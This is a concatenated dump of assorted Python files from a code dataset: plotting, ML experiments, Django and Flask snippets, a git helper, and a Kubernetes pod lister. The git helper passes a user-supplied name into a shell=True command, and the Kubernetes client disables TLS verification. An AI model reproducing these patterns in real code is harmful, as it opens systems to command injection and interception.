+ theme_fs()\n + theme(\n axis_text_y=element_blank(),\n axis_ticks_major_y=element_blank(),\n axis_title_y=element_blank(),\n legend_title=element_blank(),\n legend_position='top',\n legend_box='horizontal',\n )\n )\n return plt\n\n\ndef main():\n args = argument_parsing()\n\n print('Loading data from: ' + 'data/input_reduction_stats_{}.pkl'.format(args.id))\n len_df, conf_df = load_data('data/input_reduction_stats_{}.pkl'.format(args.id))\n print(len_df)\n\n print('Generating length histogram plot...')\n len_plt = create_length_plot(len_df)\n\n len_output_file = figfile('input_reduction_length_histogram_{}.pdf'.format(args.id))\n print('Saving to: ' + str({len_output_file}))\n len_plt.save(len_output_file)\n\n\ndef argument_parsing():\n parser = argparse.ArgumentParser(description='One argparser')\n parser.add_argument('--id', type=int, help='ID number')\n args = parser.parse_args()\n return args\n\nif __name__ == \"__main__\":\n main()","sub_path":"SA/analysis/create_ir_figures.py","file_name":"create_ir_figures.py","file_ext":"py","file_size_in_byte":6194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"159096424","text":"\n\nfrom xai.brain.wordbase.adjectives._visionary import _VISIONARY\n\n#calss header\nclass _VISIONARIES(_VISIONARY, ):\n\tdef __init__(self,): \n\t\t_VISIONARY.__init__(self)\n\t\tself.name = \"VISIONARIES\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"visionary\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_visionaries.py","file_name":"_visionaries.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"601822658","text":"#place for imports\r\nimport urllib.request\r\nimport time\r\nfrom os import system, name\r\nimport os\r\nimport requests\r\nimport configuration as config\r\n\r\ndef clear():\r\n # for windows\r\n if name == 'nt':\r\n _ = system('cls')\r\n \r\n # for macOS and linux\r\n else:\r\n _ = system('clear')\r\n\r\ndef check():\r\n print(\"CheckRa1n checker.\")\r\n print(\"Made with love by @w1nk000 and @Encryptize\")\r\n print(\"[Downloading...]\")\r\n r = requests.get(config.url, allow_redirects=True)\r\n open('index.html', 'wb').write(r.content)\r\n print(\"[Downloading done.]\")\r\n print(\"Is Checkra1n released? Checking now...\")\r\n t = time.localtime()\r\n current_time = time.strftime(\"%d.%m.%Y, %H:%M %z\")\r\n with open('index.html') as f:\r\n if 'eta son' in f.read():\r\n print(current_time + \": Still no :(\")\r\n else:\r\n print(current_time + \": FINALLY YES!!!\")\r\n os.remove('index.html')\r\n time.sleep(config.refresh)\r\n clear()\r\n\r\nwhile True:\r\n clear()\r\n check()\r\n","sub_path":"CHECKra1n.py","file_name":"CHECKra1n.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"467108222","text":"import json\nimport os\nimport re\n\nfrom typing import Any, Dict, Generator, List, Optional\n\nSUPRA_ID = \"UC6iBH7Pmiinoe902-JqQ7aQ\"\n\nBVGM_PLAYLIST_IDS = (\n \"PL9B23A78D3D249A74\", # 1\n \"PLF10B9FEF959D8065\", # 2\n \"PLB45265BFFA7BE793\", # 3\n \"PL632918E68D9E576A\", # 4\n \"PL16375BD0AA7CB9B9\", # 5\n \"PL3A5F5309568FEB54\", # 6\n \"PLz2Bd4VjE_0WzuZ8MhtJVnht77NSirtwR\", # 7\n \"PLz2Bd4VjE_0VhYCcUKF8mcOkYXVVUyBMI\", # 8\n \"PLz2Bd4VjE_0WdSywD9jjN132_0YME_psr\", # 9\n \"PLz2Bd4VjE_0Vw55wuTq7ine06pDKnkMC5\", # 10\n \"PLz2Bd4VjE_0UiEAFkiEABy9SQt1WPdp1_\", # 11\n \"PLz2Bd4VjE_0WLmOKFO1DEogbIGIp3PzRU\", # 12\n \"PLz2Bd4VjE_0Wuw9TuOipbZtx7vQNCgB-Q\", # 13\n)\nOTHER_PLAYLIST_IDS = (\n \"PLz2Bd4VjE_0WTtp7zh-kNqnbcPxVMXUZE\",\n \"PLz2Bd4VjE_0Xhvmx4l_XcsZ16AvpgBb0q\",\n \"PLz2Bd4VjE_0Xt4GMfbCll_Xt2o_QJl3T9\",\n \"PLz2Bd4VjE_0Uuo5qDjgwpdbj1pUMwhXu0\",\n \"PL719789CCE8C818B5\",\n \"PLC28D927FFE1F659B\",\n \"PL7565A9718D6CEBA3\",\n \"PL0FBC75AC445137EC\",\n \"PL518CB8785D7478E4\",\n \"PL34FAB428055ED1D3\",\n)\n\nROOT_DIR = os.path.join(os.getcwd(), \"db\")\n\nBVGM_NUM_REGEX = re.compile(r\"^.*Best VGM (\\d+).*\")\n\n\nclass DataAccess:\n def __init__(self, root_dir: Optional[str] = None):\n self.root_dir = root_dir or os.getcwd()\n self.db_dir = os.path.join(self.root_dir, \"db\")\n\n @staticmethod\n def __get_json(abs_file_path: str) -> Any:\n with open(abs_file_path, mode=\"r\", encoding=\"utf-8\") as f:\n raw_data = f.read()\n result = json.loads(raw_data)\n\n return result\n\n @staticmethod\n def __get_bvgm_number(video) -> int:\n title = video[\"snippet\"][\"title\"]\n return int(re.match(BVGM_NUM_REGEX, title).group(1))\n\n def get_playlists(self, ids: List[str] = None) -> List:\n root, _, files = next(os.walk(os.path.join(self.db_dir, \"playlists\")))\n\n result = []\n for filename in files:\n pid = filename.split(\".\")[0]\n\n # Skip if not in the desired set.\n if ids and pid not in ids:\n continue\n\n playlist = self.__get_json(os.path.join(root, filename))\n result.append(playlist)\n return result\n\n def get_pitems_dict(\n self, playlist_ids: Optional[List[str]] = None\n ) -> Dict[str, Any]:\n _, _, files = next(os.walk(os.path.join(self.db_dir, \"playlist_items\")))\n pitems_ids = [filename.split(\".\")[0] for filename in files]\n\n result = {}\n if not playlist_ids:\n _, _, files = next(os.walk(os.path.join(self.db_dir, \"playlists\")))\n playlist_ids = [filename.split(\".\")[0] for filename in files]\n for playlist_id in playlist_ids:\n if playlist_id not in pitems_ids:\n # Don't have playlist items for this playlist.\n continue\n\n result[playlist_id] = self.get_playlist_items(playlist_id)\n\n return result\n\n def get_playlist_items(self, playlist_id: str) -> List:\n return self.__get_json(\n os.path.join(self.db_dir, \"playlist_items\", f\"{playlist_id}.json\")\n )\n\n def get_videos_dict(self, playlist_ids: str) -> Dict[str, List]:\n result = {}\n for pid in playlist_ids:\n videos = [video for video in self.gen_videos_for_playlist(pid)]\n result[pid] = videos\n\n return result\n\n def gen_videos_for_playlist(self, playlist_id: str) -> Generator[Any, None, None]:\n playlist_items = self.get_playlist_items(playlist_id)\n\n for item in playlist_items:\n vid = item[\"contentDetails\"][\"videoId\"]\n try:\n yield self.get_video(vid)\n except FileNotFoundError:\n print(f\"Couldn't find video: {vid}\")\n\n return None\n\n def get_all_videos(self, sort: bool = False):\n videos = []\n\n root, _, files = next(os.walk(os.path.join(self.db_dir, \"videos\")))\n\n for filename in files:\n video = self.__get_json(os.path.join(root, filename))\n videos.append(video)\n\n if sort:\n videos.sort(key=lambda item: self.__get_bvgm_number(item))\n\n return videos\n\n def gen_all_videos_in_order(\n self, from_vid: Optional[str] = None\n ) -> Generator[Any, None, None]:\n ordered_vids = self.__get_json(os.path.join(self.db_dir, \"bvgm_video_ids.json\"))\n\n if from_vid:\n from_index = ordered_vids.index(from_vid)\n ordered_vids = ordered_vids[from_index:]\n\n for vid in ordered_vids:\n yield self.__get_json(os.path.join(self.db_dir, \"videos\", f\"{vid}.json\"))\n\n return None\n\n def get_video(self, vid: str):\n return self.__get_json(os.path.join(self.db_dir, \"videos\", f\"{vid}.json\"))\n\n def get_threads_for_video(self, vid: str):\n return self.__get_json(\n os.path.join(self.db_dir, \"commentThreads\", f\"{vid}.json\")\n )\n\n def have_video(self, vid: str):\n return os.path.exists(os.path.join(self.db_dir, \"videos\", f\"{vid}.json\"))\n\n def have_comments_for_video(self, vid: str):\n return os.path.exists(\n os.path.join(self.db_dir, \"commentThreads\", f\"{vid}.json\")\n )\n","sub_path":"data_access.py","file_name":"data_access.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"88746310","text":"from django.db import models\n\n# Create your models here.\n\nclass System(models.Model):\n CATEGORY = [\n (\"system\", \"system\"),\n (\"data_store\", \"dateStore\")\n ]\n\n SERVICE = [\n ('internal', \"internal\"),\n (\"outernal\", \"outernal\")\n ]\n\n name = models.CharField(max_length=255)\n category = models.CharField(\n max_length=20,\n choices=CATEGORY,\n default=\"system\"\n )\n service = models.CharField(\n max_length=10,\n choices=SERVICE,\n default=\"internal\"\n )\n memo = models.TextField(null=True, blank=True)\n layer = models.IntegerField(default=1)\n connect_to = models.ManyToManyField(\"self\", verbose_name=\"接続先\", blank=True)\n connect_from = models.ManyToManyField(\"self\", verbose_name=\"接続元\", blank=True)\n parent = models.ManyToManyField(\"self\", verbose_name=\"親システム\", blank=True)\n\n def __str__(self):\n return \"{}(L{})\".format(self.name, self.layer)","sub_path":"overviewer/systems/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"71280745","text":"# echo \"# automation\" >> README.md\n# git init\n# git add README.md\n# git commit -m \"first commit\"\n# git remote add origin https://github.com/3lif1/automation.git\n# git push -u origin master\n\nimport subprocess\nimport argparse\n\n\ndef commands(automation, URL_github):\n shell = \"echo {} >> README.md\".format(automation)\n subprocess.call(shell, shell=True)\n subprocess.call([\"git\", \"init\"])\n subprocess.call([\"git\", \"add\", \"-A\"])\n subprocess.call([\"git\", \"commit\", \"-m\", \"\\\"first commit\\\"\"])\n subprocess.call([\"git\", \"remote\", \"add\", \"origin\", URL_github])\n subprocess.call([\"git\", \"push\", \"-u\", \"origin\", \"master\"])\ndef get_arguments():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"-p\", \"--project_name\", dest=\"project_name\", help=\"specify your project name\")\n parser.add_argument(\"-u\", \"--UserName\", dest=\"UserName\", help=\"specify your User name in github\")\n\n options = parser.parse_args()\n\n #handling errors:\n if not options.project_name:\n parser.error(\"[-] Please specify your project name\")\n elif not options.UserName:\n parser.error(\"[-] Please specify your User name in github\")\n return options\n\noptions = get_arguments()\n\nURL_github = \"https://github.com/{}/{}.git\".format(options.UserName , options.project_name)\n#print(URL_github)\n\nprojectName = options.project_name\ncommands(projectName, URL_github)\n","sub_path":"git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"457125332","text":"#encoding=utf-8\n__author__ = 'Administrator'\n\nimport logging\nimport logging.handlers\nimport os\nimport time\n\nclass LOG:\n\n def __init__(self, filesize, dir = None): #初始化,fileszie为日志文件最大大小,如果超出,则日志写入到新的文件\n if(dir is None):\n self.PATH = os.path.join(os.getcwd(), 'log')\n else:\n self.PATH = os.path.join(os.getcwd(), dir)\n self.EXTNAME = '.log'\n self.FILESIZE = filesize\n self.logger = logging.getLogger()\n self.FILENAME = ''\n\n def __check(self, filename): #私有方法__check(),用于检测并生成日志文件名\n path = os.path.join(self.PATH, time.strftime('%Y%m%d'))\n if(not os.path.exists(path)):\n os.makedirs(path)\n LOG_FILENAME = os.path.join(path, filename + self.EXTNAME)\n if(os.path.exists(LOG_FILENAME)):\n filesize = os.path.getsize(LOG_FILENAME)\n if(filesize > self.FILESIZE):\n for i in range(1,100):\n newFileName = filename + '(' + str(i) + ')'\n LOG_FILENAME = os.path.join(path, newFileName + self.EXTNAME)\n if(os.path.exists(LOG_FILENAME)):\n filesize = os.path.getsize(LOG_FILENAME)\n if(filesize < self.FILESIZE):\n break\n else:\n break\n self.FILENAME = LOG_FILENAME\n\n def __info(self, content): #私有方法 __info()\n handler = logging.FileHandler(self.FILENAME)\n formatter = logging.Formatter('%(asctime)s %(levelname)s:%(message)s')\n handler.setFormatter(formatter)\n self.logger.addHandler(handler)\n self.logger.level = logging.NOTSET\n self.logger.info(content)\n self.logger.removeHandler(handler)\n handler.close()\n\n def info(self, content): #公共方法 info() 写info日志\n self.__check('info')\n self.__info(content)\n\n def __debug(self, content): #私有方法 __debug\n handler = logging.FileHandler(self.FILENAME)\n formatter = logging.Formatter('%(asctime)s %(levelname)s:%(message)s')\n handler.setFormatter(formatter)\n self.logger.addHandler(handler)\n self.logger.level = logging.NOTSET\n self.logger.debug(content)\n self.logger.removeHandler(handler)\n handler.close()\n\n def debug(self, content): #公共方法 debug() 写debug日志\n self.__check('debug')\n self.__debug(content)\n\n def __warning(self, content): #私有方法 __warning()\n handler = logging.FileHandler(self.FILENAME)\n formatter = logging.Formatter('%(asctime)s %(levelname)s:%(message)s')\n handler.setFormatter(formatter)\n self.logger.addHandler(handler)\n self.logger.level = logging.NOTSET\n self.logger.warning(content)\n self.logger.removeHandler(handler)\n handler.close()\n\n def warning(self, content): #公共方法 warning() 写warning日志\n self.__check('warning')\n self.__warning(content)\n\n def __error(self, content): #私有方法 __error()\n handler = logging.FileHandler(self.FILENAME)\n formatter = logging.Formatter('%(asctime)s %(levelname)s:%(message)s')\n handler.setFormatter(formatter)\n self.logger.addHandler(handler)\n self.logger.level = logging.NOTSET\n self.logger.error(content)\n self.logger.removeHandler(handler)\n handler.close()\n\n def error(self, content): #公共方法 error() 写error日志\n self.__check('error')\n self.__error(content)","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"324569420","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nOne-player Alpha Zero\n@author: Thomas Moerland, Delft University of Technology\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport time\nfrom utils.parser_setup import setup_parser, parse_game_params, parse_alg_name\nplt.style.use('ggplot')\nfrom agent import agent\n\n#### Command line call, parsing and plotting ##\ncolors = ['r', 'b', 'g', 'orange', 'c', 'k', 'purple', 'y']\nmarkers = ['o', 's', 'v', 'D', 'x', '*', '|', '+', '^', '2', '1', '3', '4']\n\nbudgets = [1000, 5000, 10000, 20000, 35000]\nif __name__ == '__main__':\n\n # Obtain the command_line arguments\n args = setup_parser()\n\n start_time = time.time()\n time_str = str(start_time)\n out_dir = 'logs/' + args.game + '/' + time_str + '/'\n\n\n def pre_process():\n from gym.envs.registration import register\n try:\n register(\n id='Blackjack_pi-v0',\n entry_point='envs.blackjack_pi:BlackjackEnv',\n )\n except:\n print(\"Something wrong registering Blackjack environment\")\n\n # Disable GPU acceleration if not specifically requested\n if not args.gpu:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\n fun_args = [args.game, args.n_ep, args.n_mcts, args.max_ep_len, args.lr, args.c, args.gamma,\n args.data_size, args.batch_size, args.temp, args.n_hidden_layers, args.n_hidden_units,\n True, args.eval_freq, args.eval_episodes, args.n_epochs]\n exps = []\n\n game_params = parse_game_params(args)\n\n # Define the name of the agent to be stored in the dataframe\n if args.stochastic:\n agent_name = \"dpw_\"\n elif args.particles > 0:\n agent_name = str(args.particles) + \"_pf_\"\n else:\n agent_name = \"classic_\"\n\n if args.mcts_only:\n agent_name += \"mcts_only\"\n else:\n agent_name += \"alphazero\"\n min_alpha = 0.5\n delta_alpha = 0.1\n max_alpha = 1.\n for budget in budgets:\n alpha = min_alpha\n while alpha <= max_alpha + 0.01:\n # If required, prepare the budget scheduler parameters\n scheduler_params = None\n print(\"Performing experiment with budget \" + str(budget) + \" alpha:\" + str(alpha) + \"!\")\n print()\n if args.budget_scheduler:\n assert args.min_budget < budget, \"Minimum budget for the scheduler cannot be larger \" \\\n \"than the overall budget\"\n assert args.slope >= 1.0, \"Slope lesser than 1 causes weird schedule function shapes\"\n scheduler_params = {\"slope\": args.slope,\n \"min_budget\": args.min_budget,\n \"mid\": args.mid}\n\n alg = parse_alg_name(args)\n\n out_dir = \"logs/\" + args.game + \"/alpha_experiment/\"\n if not args.budget_scheduler:\n out_dir += 'no_scheduler/'\n out_dir += str(alpha)[:3]\n if args.game == 'RiverSwim-continuous':\n out_dir += \"/\" + \"fail_\" + str(args.fail_prob)\n out_dir += \"/\" + alg + str(budget) + '/' + time_str + '/'\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\n # Run experiments\n n_mcts = np.inf\n out_dir_i = out_dir + '/'\n # Run the algorithm\n episode_returns, timepoints, a_best, \\\n seed_best, R_best, offline_scores = agent(game=args.game,\n n_ep=args.n_ep,\n n_mcts=n_mcts,\n max_ep_len=args.max_ep_len,\n budget=budget,\n lr=args.lr,\n c=args.c,\n gamma=args.gamma,\n data_size=args.data_size,\n batch_size=args.batch_size,\n temp=args.temp,\n n_hidden_layers=args.n_hidden_layers,\n n_hidden_units=args.n_hidden_units,\n stochastic=args.stochastic,\n alpha=alpha,\n numpy_dump_dir=out_dir_i,\n visualize=False,\n eval_freq=args.eval_freq,\n eval_episodes=args.eval_episodes,\n pre_process=None,\n game_params=game_params,\n n_epochs=args.n_epochs,\n parallelize_evaluation=args.parallel,\n mcts_only=args.mcts_only,\n particles=args.particles,\n n_workers=args.n_workers,\n use_sampler=args.use_sampler,\n unbiased=args.unbiased,\n biased=args.biased,\n variance=args.variance,\n depth_based_bias=args.depth_based_bias,\n max_workers=args.max_workers,\n scheduler_params=scheduler_params,\n out_dir=out_dir,\n second_version=args.second_version,\n third_version=args.third_version)\n\n total_rewards = offline_scores[0][0]\n undiscounted_returns = offline_scores[0][1]\n evaluation_lenghts = offline_scores[0][2]\n evaluation_pit_action_counts = offline_scores[0][3]\n\n indices = []\n returns = []\n lens = []\n rews = []\n counts = []\n\n gamma = args.gamma\n\n # Compute the discounted return\n for r_list in undiscounted_returns:\n discount = 1\n disc_rew = 0\n for r in r_list:\n disc_rew += discount * r\n discount *= gamma\n rews.append(disc_rew)\n\n # Fill the lists for building the dataframe\n for ret, length, count in zip(total_rewards, evaluation_lenghts, evaluation_pit_action_counts):\n returns.append(ret)\n lens.append(length)\n indices.append(agent_name)\n counts.append(count)\n\n # Store the result of the experiment\n data = {\"agent\": indices,\n \"total_reward\": returns,\n \"discounted_reward\": rews,\n \"length\": lens,\n \"budget\": [budget] * len(indices)}\n\n # Store the count of pit stops only if analyzing Race Strategy problem\n if \"RaceStrategy\" in args.game:\n data[\"pit_count\"] = counts\n\n # Write the dataframe to csv\n df = pd.DataFrame(data)\n df.to_csv(out_dir + \"/data.csv\", header=True, index=False)\n alpha += delta_alpha\n alpha = round(alpha, 1)\n","sub_path":"run_multiple_alpha_experiment.py","file_name":"run_multiple_alpha_experiment.py","file_ext":"py","file_size_in_byte":7960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"112785878","text":"import time\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn import metrics\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import *\n\nTRAIN_DATA_FILE = 'train_mapped.tsv'\n\n\ndef load_train_data(path):\n data = pd.read_csv(path, sep='\\t', header=0)\n\n data['Sentiment'] = data['Sentiment'].map(lambda x: 0 if x == 0 else x)\n data['Sentiment'] = data['Sentiment'].map(lambda x: 1 if x == 2 else x)\n data['Sentiment'] = data['Sentiment'].map(lambda x: 2 if x == 4 else x)\n\n # Remove empty\n data['Phrase'].replace('', np.nan, inplace=True)\n data.dropna(subset=['Phrase'], inplace=True)\n\n data['Phrase'] = data['Phrase'].astype(str)\n\n return data\n\n\ncurrent_time = time.time()\n\ntrain = load_train_data('../data/' + TRAIN_DATA_FILE)\n\nload_time = time.time() - current_time\n\nprint('Time to Load ' + TRAIN_DATA_FILE + ': ' + str(load_time) + 's')\n\ntrain_X, test_X, train_y, test_y = train_test_split(train['Phrase'], train['Sentiment'], test_size=0.20)\n\nbigram_vectorizer = CountVectorizer(analyzer=\"word\",\n tokenizer=None,\n preprocessor=None,\n stop_words=None,\n ngram_range=(1, 1),\n strip_accents='unicode')\n\nbigram_feature_matrix_train = bigram_vectorizer.fit_transform(train_X)\nbigram_feature_matrix_test = bigram_vectorizer.transform(test_X)\n\nbigram_multinomialNB_classifier = MultinomialNB().fit(bigram_feature_matrix_train, train_y)\nbigram_multinomialNB_prediction = bigram_multinomialNB_classifier.predict(bigram_feature_matrix_test)\n\nmodel = 'Unigram-Trigram Multinomial Naive Bayes'\ntarget_names = ['0', '1', '2']\n\nprint(\n '-------' + '-' * len(model))\nprint(\n 'MODEL:', model)\nprint(\n '-------' + '-' * len(model))\n\nprint(\n 'Precision = ' + str(metrics.precision_score(test_y, bigram_multinomialNB_prediction, average=None)))\nprint(\n 'Recall = ' + str(metrics.recall_score(test_y, bigram_multinomialNB_prediction, average=None)))\nprint(\n 'F1 = ' + str(metrics.f1_score(test_y, bigram_multinomialNB_prediction, average=None)))\nprint(\n 'Accuracy = %.2f%%' % (metrics.accuracy_score(test_y, bigram_multinomialNB_prediction) * 100.0))\nprint(\n 'Confusion matrix = \\n' + str(\n metrics.confusion_matrix(test_y, bigram_multinomialNB_prediction, labels=[0, 1, 2])))\nprint('\\nClassification Report:\\n' + classification_report(test_y, bigram_multinomialNB_prediction,\n target_names=target_names))\nprint('Time to Train and Test: ' + str(time.time() - current_time) + 's')\n","sub_path":"src/model_naive_bayes.py","file_name":"model_naive_bayes.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"212761051","text":"from pathlib import Path\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom torch.utils.data import Dataset\n\n\ndef open_image(image_name, colors):\n image_name = str(image_name)\n channels = [Image.open(image_name+'_'+color+'.png') for color in colors]\n img = np.stack([np.asanyarray(c) for c in channels], axis=-1)\n img = Image.fromarray(img)\n return img\n\n\nclass ProteinDataset(Dataset):\n def __init__(self, csv_file, images_dir,\n colors=['red', 'green', 'blue'], \n idxs=None, transforms=None):\n csv_content = pd.read_csv(csv_file)\n self._filenames = np.array(csv_content['Id'].tolist())\n self._labels = MultiLabelBinarizer().fit_transform([tuple(int(i) for i in item.split(' ')) \n for item in csv_content['Target'].tolist()])\n assert len(self._filenames) == len(self._labels)\n if idxs is not None:\n self._filenames = self._filenames[idxs]\n self._labels = self._labels[idxs]\n \n self._images_dir = images_dir\n self._colors = colors \n self._transforms = transforms\n \n def __len__(self):\n return len(self._filenames)\n \n def __getitem__(self, idx):\n image = open_image(self._images_dir / self._filenames[idx], \n self._colors)\n if self._transforms is not None:\n image = self._transforms(image)\n \n labels = self._labels[idx]\n \n sample = (image, labels)\n \n return sample","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"568720014","text":"#!/usr/bin/env python\nimport os\nimport sys\nfrom datetime import datetime\nfrom datetime import timedelta\n\n\"\"\"\nAmount of time to look back when restarting\nthe listener. This helps make sure that we don't\nlose any edit when the listener is restarted.\n\"\"\"\nLOOKBEHIND_OFFSET = timedelta(minutes=5)\n\nif __name__ == '__main__':\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"editgroups.settings\")\n import django\n django.setup()\n\n from store.stream import WikiEditStream\n from store.utils import grouper\n from store.models import Edit\n\n print('Listening to edits...')\n s = WikiEditStream()\n utcnow = datetime.utcnow()\n try:\n latest_edit_seen = Edit.objects.order_by('-timestamp')[0].timestamp\n fetch_from = latest_edit_seen - LOOKBEHIND_OFFSET\n except IndexError:\n fetch_from = None\n print('Starting from offset %s' % fetch_from.isoformat() if fetch_from else 'now')\n\n for i, batch in enumerate(grouper(s.stream(fetch_from), 50)):\n if i % 50 == 0:\n print('batch %d' % i)\n print(datetime.fromtimestamp(batch[0].get('timestamp')))\n sys.stdout.flush()\n Edit.ingest_edits(batch)\n\n print('End of stream')\n\n","sub_path":"listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"281732490","text":"##############################################################################\n# Copyright by The HDF Group. #\n# All rights reserved. #\n# #\n# This file is part of HSDS (HDF5 Scalable Data Service), Libraries and #\n# Utilities. The full HSDS copyright notice, including #\n# terms governing use, modification, and redistribution, is contained in #\n# the file COPYING, which can be found at the root of the source code #\n# distribution tree. If you do not have access to this file, you may #\n# request a copy from help@hdfgroup.org. #\n##############################################################################\n#\n# Kubernetes utility functions\n#\n\nfrom kubernetes import client as k8s_client\nfrom kubernetes import config as k8s_config\nimport urllib3\nfrom .. import hsds_logger as log\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n\ndef getPodIps(k8s_app_label, k8s_namespace=None):\n \"\"\" Return list of IPs of all pods in the cluster with given app label\n (and namespace if set)\n \"\"\"\n\n # get the config from within the cluster and set it as the default config\n # for all new clients\n k8s_config.load_incluster_config()\n c = k8s_client.Configuration() # go and get a copy of the default config\n c.verify_ssl = False # set verify_ssl to false in that config\n # make that config the default for all new clients\n k8s_client.Configuration.set_default(c)\n v1 = k8s_client.CoreV1Api()\n if k8s_namespace:\n # get pods for given namespace\n log.debug(f\"getting pods for namespace: {k8s_namespace}\")\n ret = v1.list_namespaced_pod(namespace=k8s_namespace)\n else:\n log.info(\"getting pods for all namespaces\")\n ret = v1.list_pod_for_all_namespaces(watch=False)\n pod_ips = []\n for i in ret.items:\n pod_ip = i.status.pod_ip\n if not pod_ip:\n continue\n labels = i.metadata.labels\n if labels and \"app\" in labels and labels[\"app\"] == k8s_app_label:\n msg = f\"found hsds pod with app label: {k8s_app_label} \"\n msg += f\"- ip: {pod_ip}\"\n log.debug(msg)\n pod_ips.append(pod_ip)\n\n pod_ips.sort() # for assigning node numbers\n return pod_ips\n","sub_path":"hsds/util/k8sClient.py","file_name":"k8sClient.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"233855453","text":"\nfrom collections import defaultdict\nfrom typing import DefaultDict, Dict\n\n\nclass Averager:\n \"\"\"\n iterationごとのloss, metricsの情報を保持\n 平均を出力\n \"\"\"\n def __init__(self) -> None:\n self.current_total: DefaultDict[str, float] = defaultdict(float)\n self.iterations = 0\n\n def send(self, dictionary: Dict[str, float]) -> None:\n for key, value in dictionary.items():\n self.current_total[key] += value\n self.iterations += 1\n\n def reset(self) -> None:\n for key in self.current_total.keys():\n self.current_total[key] = 0.0\n self.iterations = 0\n\n def value(self) -> Dict[str, float]:\n if self.iterations == 0:\n return {}\n average_dict = dict()\n for key, value in self.current_total.items():\n average_dict[key] = value / self.iterations\n return average_dict\n","sub_path":"various_image_recognition_models/src/loggers/utils/averager.py","file_name":"averager.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"41519346","text":"#while(1) means it is true while statement\nwhile(1):\n #\\n is new line character\n inp=int(input(\"Enter Your Number\\n\"))\n if inp>=100:\n print(\"Congrats you have entered a number greater than 100\")\n break\n else:\n print(\"Try Again!\\n\")\n continue\n","sub_path":"python_basics/whileloop.py","file_name":"whileloop.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"9206438","text":"from rest_framework import serializers\n\nfrom . import models\n\n\nclass RiskFieldSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.RiskField\n fields = ('id', 'name', 'type', 'options')\n extra_kwargs = {\n 'options': {'required': False},\n 'id': {\n 'read_only': False,\n 'required': False\n },\n }\n\n\nclass RiskTypeSerializer(serializers.ModelSerializer):\n risk_fields = RiskFieldSerializer(many=True, required=False)\n\n class Meta:\n model = models.RiskType\n fields = ('id', 'name', 'risk_fields', 'table_name')\n read_only_fields = ('id', 'table_name')\n\n def create(self, validated_data):\n risk_fields = validated_data.pop('risk_fields', [])\n risk_type = super(RiskTypeSerializer, self).create(validated_data)\n for field in risk_fields:\n risk_type.risk_fields.create(**field)\n return risk_type\n\n def update(self, instance, validated_data):\n risk_fields = validated_data.pop('risk_fields', [])\n instance = super(RiskTypeSerializer, self).update(\n instance, validated_data)\n for field_data in risk_fields:\n field_id = field_data.pop('id', None)\n if field_id:\n field = instance.risk_fields.get(id=field_id)\n for field_key, field_value in field_data.items():\n setattr(field, field_key, field_value)\n field.save()\n else:\n instance.risk_fields.create(**field_data)\n return instance\n","sub_path":"custom/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"467940986","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import AiClass\n\n# Create your views here.\nstudents=['jisu','suho','minsu']\n\ndef home(request):\n classes=AiClass.objects.all()\n\n context={\n 'classes':classes\n }\n\n return render(request,'home.html',context)","sub_path":"firstproject/firstapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"565307759","text":"from flask import Flask, jsonify, request, g\nfrom flask_cors import CORS\nfrom controllers import people\nfrom werkzeug import exceptions\nimport sqlite3\n\napp = Flask(__name__)\nCORS(app)\n\nDATABASE = \"./database/database.db\"\n\n@app.route('/')\ndef home():\n init_db()\n return 